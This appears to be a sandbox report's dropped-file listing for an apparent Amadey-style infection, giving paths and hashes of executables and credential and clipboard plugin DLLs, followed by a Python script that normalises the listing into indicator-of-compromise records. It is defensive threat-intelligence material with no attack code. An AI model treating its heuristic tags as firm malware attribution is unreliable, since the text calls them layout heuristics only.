| SHA1 | 7d6b6083ec9081f52517cc7952dfb0c1c416e395 |
| SHA256 | 07b974442b53035b8d057a7b429c191fe71f149a698041b005ee85645a89c165 |
| SHA512 | 2ab2d4771841ebbeb195d21697c1708db985ae821a7ed3e2bb050c5759fbdb1e7784354fa5611e377a603a6db437e90a7258ecfcbea7703e584330b91eacac68 |
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
| MD5 | b7c05216d55cd437ddd7edd811cdee80 |
| SHA1 | ba0490a14b8243f684d9b9975b7e6c5087f976e1 |
| SHA256 | 922a4c143d4517afbd2a8254776283a2b8982a6ed6950a0024ca86357db1eab8 |
| SHA512 | d3ea0b9515c9138ef6f7459b9fe3a91af03d38dddd538776c054731bfb4df78fa19794163c725c5ee0d906041c16ac53dff9d1fe7b2579564fabb1b5d394ee10 |
C:\Users\Admin\AppData\Local\Temp\1000283001\AdobeNulled.exe
| MD5 | d6b1da476e7eb90b0cb92cd28aa4ca67 |
| SHA1 | 01b2e91459ab90a0bf446d75a49029dac377e0c5 |
| SHA256 | 9b599dc5f34c6e9b2a675cf47b01404c0828f19842037e3bf484b8fa25dfe397 |
| SHA512 | d2698dee4d3b2342076cddb8619e1c6faba1ad28ceab32e47d68676084963c47a036da53c406bd52f89340988e100cbe21fa1f60b9a3309fdb83850bd37834fc |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\python39.dll
| MD5 | 2135da9f78a8ef80850fa582df2c7239 |
| SHA1 | aac6ad3054de6566851cae75215bdeda607821c4 |
| SHA256 | 324963a39b8fd045ff634bb3271508dab5098b4d99e85e7648d0b47c32dc85c3 |
| SHA512 | 423b03990d6aa9375ce10e6b62ffdb7e1e2f20a62d248aac822eb9d973ae2bf35deddd2550a4a0e17c51ad9f1e4f86443ca8f94050e0986daa345d30181a2369 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\select.pyd
| MD5 | 35bb285678b249770dda3f8a15724593 |
| SHA1 | a91031d56097a4cbf800a6960e229e689ba63099 |
| SHA256 | 71ed480da28968a7fd07934e222ae87d943677468936fd419803280d0cad07f3 |
| SHA512 | 956759742b4b47609a57273b1ea7489ce39e29ebced702245a9665bb0479ba7d42c053e40c6dc446d5b0f95f8cc3f2267af56ccaaaf06e6875c94d4e3f3b6094 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\_socket.pyd
| MD5 | cd56f508e7c305d4bfdeb820ecf3a323 |
| SHA1 | 711c499bcf780611a815afa7374358bbfd22fcc9 |
| SHA256 | 9e97b782b55400e5a914171817714bbbc713c0a396e30496c645fc82835e4b34 |
| SHA512 | e937c322c78e40947c70413404beba52d3425945b75255590dedf84ee429f685e0e5bc86ad468044925fbc59cf7ec8698a5472dd4f05b4363da30de04f9609a5 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\_ctypes.pyd
| MD5 | a1e9b3cc6b942251568e59fd3c342205 |
| SHA1 | 3c5aaa6d011b04250f16986b3422f87a60326834 |
| SHA256 | a8703f949c9520b76cb1875d1176a23a2b3ef1d652d6dfac6e1de46dc08b2aa3 |
| SHA512 | 2015b2ae1b17afc0f28c4af9cedf7d0b6219c4c257dd0c89328e5bd3eee35e2df63ef4fccb3ee38e7e65f01233d7b97fc363c0eae0cfa7754612c80564360d6f |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\base_library.zip
| MD5 | 708cd92aabf14229a27704ca4c7d5fd5 |
| SHA1 | d540c602ebb83e03e1700e2e473e80df20420bd2 |
| SHA256 | b31f5ec756404e45515361e05531d86c836eafbea8c66698fb0909214fb521b1 |
| SHA512 | cdd9b6adc710b1c35107b73342b49fa365964661daf60db8e0e8b0449268b47008b3fb5c5ab3f5aa59b09c284847559bf7b45b27161249e4960f3533f63ab9ef |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
\Users\Admin\AppData\Local\Temp\_MEI38922\_pytransform.dll
| MD5 | 8da830f3342cb4be4503023a06ecbe0a |
| SHA1 | 5b08adda5fea612b9506143dd4d512f751b66539 |
| SHA256 | a740eeef191b44dbb127526c39208427ae5f8fbcc1969415cc90ebbd23db7567 |
| SHA512 | 99dc6e99ff278f95ddf454965ff6b5efc9c1e7fe5ae4163473394e5a22df17a6e1af44bb9a97e4469b5ed000892efaa75f97b39da62a03fe85c27c9d875c353c |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\_pytransform.dll
| MD5 | 8da830f3342cb4be4503023a06ecbe0a |
| SHA1 | 5b08adda5fea612b9506143dd4d512f751b66539 |
| SHA256 | a740eeef191b44dbb127526c39208427ae5f8fbcc1969415cc90ebbd23db7567 |
| SHA512 | 99dc6e99ff278f95ddf454965ff6b5efc9c1e7fe5ae4163473394e5a22df17a6e1af44bb9a97e4469b5ed000892efaa75f97b39da62a03fe85c27c9d875c353c |
memory/4976-3211-0x0000000007350000-0x0000000007360000-memory.dmp
memory/4976-3214-0x0000000007350000-0x0000000007360000-memory.dmp
memory/4976-3218-0x0000000007350000-0x0000000007360000-memory.dmp
memory/4976-3229-0x00000000079F0000-0x0000000007A3B000-memory.dmp
memory/4976-3267-0x0000000007350000-0x0000000007360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
| MD5 | 62fcfb3364b29b80ff25dbaac9d996be |
| SHA1 | 65ddd1e0d0da59ece403976108e9173c847adcd1 |
| SHA256 | df3c03a2b576d0b973ca15df8f95afca29c3ba06aefebcaecb9ca69d87cf3c29 |
| SHA512 | d925e4f725c2a325d313f74cbb85ef6234ff6763596d3dc3a359a86b57d954e00a675c078ed3b6535e4a8a04f76861a0d92e44be6f825b83bb4511b7f26ccc0a |
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
memory/4308-3418-0x00000000029A0000-0x00000000029B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
| MD5 | a3eb5f22bc8e7f4060e3ff18c4ac70b9 |
| SHA1 | 8480869a34c9723063dba9cc8279cf4e7c2bc4cd |
| SHA256 | 0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6 |
| SHA512 | 3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0 |
memory/4976-4025-0x0000000007350000-0x0000000007360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
| MD5 | e0d598d93befb05bf83dd75575930992 |
| SHA1 | f2d3383d19f4b3d9f65a157ff8009c329dbf5cdc |
| SHA256 | 5848a5530488e1cce3bce9a453409f76b6d4d3a1fa716a60e2109e6e9ce55661 |
| SHA512 | c2e7d9e9f796c54c0d16f49cbe4fa3d76f9fb8a0838786a6a16019e28de9746c753832bd2ae0bfa7c8fe4e97fa6733ad1cc8de707cb0452772efac958a066d86 |
memory/1260-4163-0x0000000000E10000-0x0000000000E42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\nbc55Wv49.exe
| MD5 | e0d598d93befb05bf83dd75575930992 |
| SHA1 | f2d3383d19f4b3d9f65a157ff8009c329dbf5cdc |
| SHA256 | 5848a5530488e1cce3bce9a453409f76b6d4d3a1fa716a60e2109e6e9ce55661 |
| SHA512 | c2e7d9e9f796c54c0d16f49cbe4fa3d76f9fb8a0838786a6a16019e28de9746c753832bd2ae0bfa7c8fe4e97fa6733ad1cc8de707cb0452772efac958a066d86 |
memory/1260-4172-0x0000000005850000-0x000000000589B000-memory.dmp
memory/1260-4231-0x0000000005960000-0x0000000005970000-memory.dmp
memory/4308-4615-0x0000000000B60000-0x0000000000BB6000-memory.dmp
memory/2952-5197-0x0000014125F50000-0x0000014125F72000-memory.dmp
memory/2952-5202-0x00000141280F0000-0x0000014128166000-memory.dmp
memory/2952-5204-0x0000014125F90000-0x0000014125FA0000-memory.dmp
memory/2952-5205-0x0000014125F90000-0x0000014125FA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euqzg4we.5b2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2952-5370-0x0000014128270000-0x000001412829A000-memory.dmp
memory/2952-5389-0x0000014128270000-0x0000014128292000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe
| MD5 | 030d5e286c9668e71da8ccfcfa8a7137 |
| SHA1 | ece0d102e1ffc8d76a7c240cd0dc9984829f6db7 |
| SHA256 | f2d0bff02235f387d95c8b9e857d7f318a705c2a004243d190dde82029f15f17 |
| SHA512 | bd2e7e47f781a9f35ac9f01452bb4dbe453e10ee30187e7c38704f3eb25380370428a9aed8f43d800a43b04ad4b2d0312a193261fe4a944e6122bdea634c266c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 128b5c395d2956830809b9b9e5c65b5e |
| SHA1 | 34603e22e3daf2379fd6f15c0af9980757ffd97c |
| SHA256 | 7e5984cbfd4e429dc8c98159d0f65c514e8e4ab09fb39280999bcce59cc5a93f |
| SHA512 | 749f11e940d35e17af95d336a6accf88e5a69cd73b028ed23dbae07f38de30b748a324c6e390b1d87abac03df530a992d04879de079f5323fb78de61fb8ee9d7 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\AASIapp.exe
| MD5 | 030d5e286c9668e71da8ccfcfa8a7137 |
| SHA1 | ece0d102e1ffc8d76a7c240cd0dc9984829f6db7 |
| SHA256 | f2d0bff02235f387d95c8b9e857d7f318a705c2a004243d190dde82029f15f17 |
| SHA512 | bd2e7e47f781a9f35ac9f01452bb4dbe453e10ee30187e7c38704f3eb25380370428a9aed8f43d800a43b04ad4b2d0312a193261fe4a944e6122bdea634c266c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d833a8f5307a256c1b09861700e772d4 |
| SHA1 | 27c02a2379464606945e69cc1911017f5148e1e4 |
| SHA256 | 019660844bf920efb15aa866468c1d18a2a5ea7b5d0fc5b808f2db22a881da81 |
| SHA512 | dae581651c166cfd9cfd0dbb15de1a86ebcf5bb76e5002b98ae1195539135f96130a8fe4e833c1f248eb51a085bdc669ed915af3a27fe35c52be11c99aa0632b |
memory/4824-5436-0x0000015F39290000-0x0000015F392A0000-memory.dmp
memory/4824-5437-0x0000015F39290000-0x0000015F392A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\spinner.html
| MD5 | fc95f498ed351f71cbc507080380454f |
| SHA1 | 6c7775a78de16b8f0688d7db3afb46a77cdaeb92 |
| SHA256 | 0c22e5a082eab2629b68a50a59391a1274ff13c9b156c2da411da87e774f0011 |
| SHA512 | 2bca5ef39cefe1726e66ec456fd09640944d3ac036d6a3f6cb0f4dd48f9a5e1e09cf9fc228ee80a56af62e53c5be5724606098e2172ef6ca42f750efbd935519 |
memory/4824-5467-0x0000015F39290000-0x0000015F392A0000-memory.dmp
memory/4824-5471-0x0000015F39290000-0x0000015F392A0000-memory.dmp
memory/4824-5688-0x0000015F545B0000-0x0000015F54D56000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
| SHA512 | 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
| SHA512 | 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff |
\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
| SHA512 | 91f67248e47b2fced9ff802370ced4e0de675d06e7ef32acd40a479fecfe8b912dfb2abf76cb8b391f471d8dd134b5f041186541a8038ef84219c852f31f37ff |
memory/4824-5732-0x0000015F39290000-0x0000015F392A0000-memory.dmp
memory/4824-5733-0x0000015F39290000-0x0000015F392A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | e1fe62c436de6b2c3bf0fd32e0f779c1 |
| SHA1 | dbaadf172ed878592ae299e27eb98e2614b7b36b |
| SHA256 | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 |
| SHA512 | e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | d1eb5caae43e95e1f369ca373a5e192d |
| SHA1 | bafa865f8f2cb5bddf951357e70af9fb011d6ac2 |
| SHA256 | cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0 |
| SHA512 | e4f4fd7b4cfa15f5de203601e5317be2245df7cf1cb05eb9fac0a90fb2a01c42be9b6e31662d76b678c1bea731c467bed1aae61fe0c1cbb6fea3c159677b691a |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | e1fe62c436de6b2c3bf0fd32e0f779c1 |
| SHA1 | dbaadf172ed878592ae299e27eb98e2614b7b36b |
| SHA256 | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 |
| SHA512 | e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee |
\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | e1fe62c436de6b2c3bf0fd32e0f779c1 |
| SHA1 | dbaadf172ed878592ae299e27eb98e2614b7b36b |
| SHA256 | 3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405 |
| SHA512 | e0749db80671b0e446d54c7edb1ff11ea6ba5728eabce567bb8d81fa4aa66872d5255e4f85b816e5634eada1314ff272dd6dbf89c1b18e75702fe92ba15348ee |
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
| MD5 | ebd584e9c1a400cd5d4bafa0e7936468 |
| SHA1 | d263c62902326425ed17855d49d35003abcd797b |
| SHA256 | ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b |
| SHA512 | e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010 |
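The listing above is raw sandbox output, and it takes some normalising before it is usable as an indicator set: the same dropped file is recorded once per drop event (so `nbveek.exe`, `AASIapp.exe` and the `cred64.dll`/`clip64.dll` pairs appear several times), a file is reported both as an NT-style `\Users\...` path and as a Win32 `C:\Users\...` path, and not every entry is an indicator at all. The `__PSScriptPolicyTest_*.ps1` file in particular is written by PowerShell itself when it probes the script execution policy; its hashes here are exactly the MD5, SHA1 and SHA256 of the one-byte content `1`, so they match on every clean host and must not be pushed into a blocklist. The following Python is an added example, not part of the sandbox report or any vendor tooling. It parses this path-plus-hash-row format (with the interleaved `memory/...` dump references), keys files by SHA256, collapses the two path spellings (assumption: drive-less paths are on the system drive), drops the PowerShell probe file, and attaches heuristic tags; the `amadey-style-plugin` tag is only a layout heuristic (`Roaming\<14 hex>\cred64.dll|clip64.dll`, consistent with the Amadey label the report assigns) and the `pyinstaller-extraction-dir` tag keys on the `_MEI<n>` directory that the report's own "Detects Pyinstaller" signature refers to. The sample input is constructed from a handful of entries copied from the listing.

```python
"""Normalise a sandbox dropped-file listing into a SHA256-keyed IOC set.

Input format (as in the report above): a path line, then `| ALG | hex |` rows,
with `memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp` lines in between.
"""
import hashlib
import re
from collections import defaultdict

# Constructed sample: entries copied from the listing above, chosen so that one
# file appears under both the NT-style and the Win32 path, one entry is repeated
# verbatim, and one entry is PowerShell's own execution-policy probe file.
SAMPLE_REPORT = r"""
\Users\Admin\AppData\Local\Temp\_MEI38922\_pytransform.dll
| MD5 | 8da830f3342cb4be4503023a06ecbe0a |
| SHA1 | 5b08adda5fea612b9506143dd4d512f751b66539 |
| SHA256 | a740eeef191b44dbb127526c39208427ae5f8fbcc1969415cc90ebbd23db7567 |
C:\Users\Admin\AppData\Local\Temp\_MEI38922\_pytransform.dll
| MD5 | 8da830f3342cb4be4503023a06ecbe0a |
| SHA1 | 5b08adda5fea612b9506143dd4d512f751b66539 |
| SHA256 | a740eeef191b44dbb127526c39208427ae5f8fbcc1969415cc90ebbd23db7567 |
memory/4976-3211-0x0000000007350000-0x0000000007360000-memory.dmp
memory/4976-3229-0x00000000079F0000-0x0000000007A3B000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | 937b902b8ad05afb922313d2341143f4 |
| SHA1 | b48d5579e01000cdb3c3ef4e1ad1b97d2056a8b1 |
| SHA256 | f0f0e7ab301101e6473f1dbcadd2272468af036195685c0ae51c9d90c40f0849 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euqzg4we.5b2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
"""

PATH_RE = re.compile(r"^(?:[A-Za-z]:)?\\[^|]+$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# PowerShell writes the single byte "1" into __PSScriptPolicyTest_*.ps1 when it
# probes the execution policy, so the file's hashes are the same on every host.
_PROBE_HASHES = {alg: getattr(hashlib, alg.lower())(b"1").hexdigest()
                 for alg in ("MD5", "SHA1", "SHA256")}


def normalize_path(path):
    # Drop the drive letter and lower-case, so the NT-style and Win32 spellings
    # of one file collapse (assumption: drive-less paths are on the system drive).
    return re.sub(r"^[A-Za-z]:", "", path).lower()


def tag_path(path):
    """Heuristic labels for a normalised path; none of these is a hard attribution."""
    tags = set()
    if re.search(r"\\_mei\d+\\", path):
        tags.add("pyinstaller-extraction-dir")
    if "\\__psscriptpolicytest_" in path:
        tags.add("powershell-policy-probe")
    if re.search(r"\\roaming\\[0-9a-f]{14}\\(cred64|clip64)\.dll$", path):
        tags.add("amadey-style-plugin")  # layout heuristic only, see lead-in
    return tags


def is_policy_probe(rec):
    """True when the recorded hashes are those of the one-byte file '1'."""
    return all(rec["hashes"].get(alg) == h for alg, h in _PROBE_HASHES.items())


def parse_report(text):
    """Return (files, dumps): files maps SHA256 -> {hashes, paths, sightings};
    dumps maps pid -> list of dumped region sizes in bytes."""
    files, dumps, pending = {}, defaultdict(list), None

    def flush():
        nonlocal pending
        if pending is None:
            return
        path, hashes = pending
        pending = None
        for alg, value in hashes.items():
            if len(value) != HEX_LEN[alg]:  # truncated or corrupted table row
                raise ValueError(f"{alg} for {path} has length {len(value)}")
        if "SHA256" not in hashes:
            raise ValueError(f"no SHA256 row for {path}")
        rec = files.setdefault(hashes["SHA256"],
                               {"hashes": hashes, "paths": set(), "sightings": 0})
        rec["paths"].add(normalize_path(path))
        rec["sightings"] += 1

    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if pending is not None:  # hash rows with no path line above are dropped
                pending[1][m.group(1)] = m.group(2).lower()
            continue
        flush()
        m = MEM_RE.match(line)
        if m:
            dumps[int(m.group(1))].append(int(m.group(3), 16) - int(m.group(2), 16))
        elif PATH_RE.match(line):
            pending = (line, {})
    flush()
    return files, dict(dumps)


def build_iocs(files):
    """Sorted (sha256, paths, sightings, tags) tuples, minus the PowerShell probe."""
    out = []
    for sha, rec in files.items():
        if is_policy_probe(rec):
            continue
        tags = set().union(*(tag_path(p) for p in rec["paths"]))
        out.append((sha, sorted(rec["paths"]), rec["sightings"], sorted(tags)))
    return sorted(out)


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE_REPORT)
    for sha, paths, seen, tags in build_iocs(files):
        print(sha, f"seen={seen}", tags, *paths)
    for pid, sizes in dumps.items():
        print(f"pid {pid}: {len(sizes)} dumps, {sum(sizes)} bytes")
```

Keying on SHA256 rather than on path is what makes the two `clip64.dll` copies under `006700e5a2ab05` and `a091ec0a6e2227` stay separate (they have different hashes) while the two spellings of `_pytransform.dll` merge; the `sightings` counter preserves how often the sandbox recorded each file, which is the only information the verbatim repeats in the listing actually carry.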